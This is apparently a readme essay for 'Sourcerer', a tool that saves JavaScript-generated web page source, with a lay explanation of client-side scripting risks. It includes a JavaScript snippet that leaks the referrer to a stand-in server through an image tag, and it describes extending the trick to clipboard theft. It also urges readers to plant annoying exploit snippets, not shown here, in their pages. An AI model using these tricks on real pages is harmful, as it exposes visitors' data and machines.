This file is a part of the sourcerer package. To find the original essays and packages
@ searchlores, use
namazu.
Overview
The Sourcerer alows you to save the source of those annoying web sites that
use JavaScript to generate content. Ordinary browsers can save only the source
of the source, for example let's suppose you have a page which says:
<SCRIPT language=javascript><!--
document.write("Hello world");//-->
</SCRIPT>
In your browser you will see only the text "Hello world", but if you save the page's
source, you will see only this piece of script. Because of this, some
really bad people
(you may think it's just funny, but, well, it's not) decided they can
make money on the backs of the others, selling them stupid
"HTML protection" software, which is more or less a javascript which decodes the
actual source on the fly.
Here's what we do. Go to
http://www.blmodirect.com/letters/b5012protected.htm (or try the local copy provided in the package
if that one is down). Rightclick on the browser window,
and choose "View source". Mm, yeah ... tons of crap. Now open the same URL in Sourcerer (copy & paste
the URL - that's the only way which is anyway the fastest, so get used to it). Choose Save source and
open the result in your text editor. That's about how you use Sourcerer. If you're playing at
+Mala's, don't forget to try it on the third riddle :)
If you have a large collection of files to convert (you downloaded them with wGet of course,
certainly NOT by hand), you can automate their conversion using the commandline:
Sourcerer.exe "file://localhost/c:/dir with spaces/index.html" c:\no_spaces_therefore_no_quotes\1.html
Sourcerer.exe http://www.searchlores.org index.htm
IMPORTANT! Please, use your brain. Sourcerer uses an IE WebBrowser control, which means
that it is effectively an IE copy. Don't use it for browsing, or you'll get hacked, spammed, flooded
or made to look stupid in any other way. Proof? (Btw, do copy these snippets in your html pages to annoy
the bozos that use IE, or better, find
fresh
ones
,or
learn
to write such scripts on your own.)
Note that these snippets will work without any user interaction whatsoever, the examples here requre a button push so you can read the article, duh :)
Also, I haven't tested them under many OS/browser combinations, on your system these may behave differently.
There are more
thorough papers on the subject for the interested reader, so this section will be
targeted to non-coding seekers, therefore will be kept as low-tech as possible.
The most important thing to know is that HTML scripting is something that happens on
YOUR side of the user-internet duet (as opposed to CGI or server-side scripting, which
happens on a server). It is also called client-side scripting. The scripts are programs,
which are interpreted (i.e. translated into machine-understandable code) and run by your
browser.
These little programs can do a lot of things (which some people may consider useful),
but are mainly designed to change or add the content of the HTML document
like for example printing the current time and date. This means that the page source,
which your browser downloads from the remote server, will be one and the same, but still
you will see different text each time. Browse to
www.searchlores.org with and without JavaScript
and see the difference.
1)<SCRIPT LANGUAGE="JavaScript">
2) document.write("<I>Updated </I>");
3) document.write("<font color=black>");
4) document.write(UpdateDate(5,7,2003));
5) document.write("</font></i>");
6)</script>
Let's follow what it does:
The 1) and 6) tags denote a piece of HTML which is a script. If the browser does not support or
accept scripting, the contents will be ignored. The "language" attribute
tells us (and more importantly - tells the browser) that this is JavaScript. The 2) 3) and 5)
lines print some text to the HTML document, which is the same as if the text was directly
included in the HTML, while 4) does something more interesting - it calls a function
(a subroutine; a small piece of code, defined elsewhere to do routine job) - which prints
the number of days since the date, specified by the three numbers (month, day, year).
Note that since the user agents ('browsers') of the current search engines do not intepret
scripts, any text written by such means will be visible only to the human reader. For example,
compare
site:searchlores.org searching with
site:searchlores.org updated
Each scripting language (JavaScript, VBScript, JScript) has it's own syntactical rules, which
are not subject to this article, and you should normally not worry about them. We can also
consider Java and Flash Action Script as such scripting languages (although they are
precompiled instead of being interpreted on the fly, but this difference is of no importance
here), because they are too executed on the client side. All these languages were designed
to be 'secure' in the means that they cannot (rather SHOULD not) read or write files from the
user's machine, execute local commands, etc. The sad thing is that exploits are continuously
found, which explore bugs in the scripting system, alowing anything from slight annoyances
(like opening all your CD trays at once) to serious security breaches (full read/write/execute
access to the victim's machine). That's why common sense dictates that we browse with scripting
turned off (no matter what browser we use).
Besides exploits, which are unnormal behaviour of the scripting system, it's normal behaviour
has some uncanny features too. Being integrated with your browser, JavaScript for example knows
WHAT kind of browser it is, what is your OS, your screen resolution, color-depth, browser history
and even the contents of your
clipboard! You may think that this is okay, since it's executed only on your machine,
but it's not, since you can do something like this:
<script language=javascript>
document.write("<img src='http://myserver.com/my_fake_image_script.gif?" + document.refferer + "'>");
</script>
This means that we include in the page's source an image tag, and the image source we provide
is in fact a masquaraded SERVER-SIDE script, which, when your
browser blindly goes to download that image, will receive the reffering URL. Or the screen
width. Or the clipboard. Or you can make the page periodically check (while it is active) if
there's something new in the clipboard and send it to your server.
Do you copy and paste your passwords?
Btw Opera users are not much more immune to these tricks, as even with images loading turned
off, some images can be loaded through css or javascript. The paranoid to the
bone should use wGet with the --page-requisites option, with faked refferer and user-agent
fields through a secure proxy to download the page they want to view. Then disconnect from
the internet, manually check each file for suspicious code (did you know that in the past
Netscape Navigator would execute javascript
hidden in GIF comments?), render the page through Sourcerer, manually cut remaining
scripts, and then hope that his browser would not be crashed by the latest strange
exploit.
It's not an easy life, being paranoid :) Yeah, well, just turn off JavaScript, okay?
Finale
The sources are included in the package, do whatever you want with them, I don't care.
To save the curious their precious time, the essence of this program is this snippet:
Dim doc As HTMLDocument
Set doc = Browser.Document
...
s = doc.documentElement.outerHTML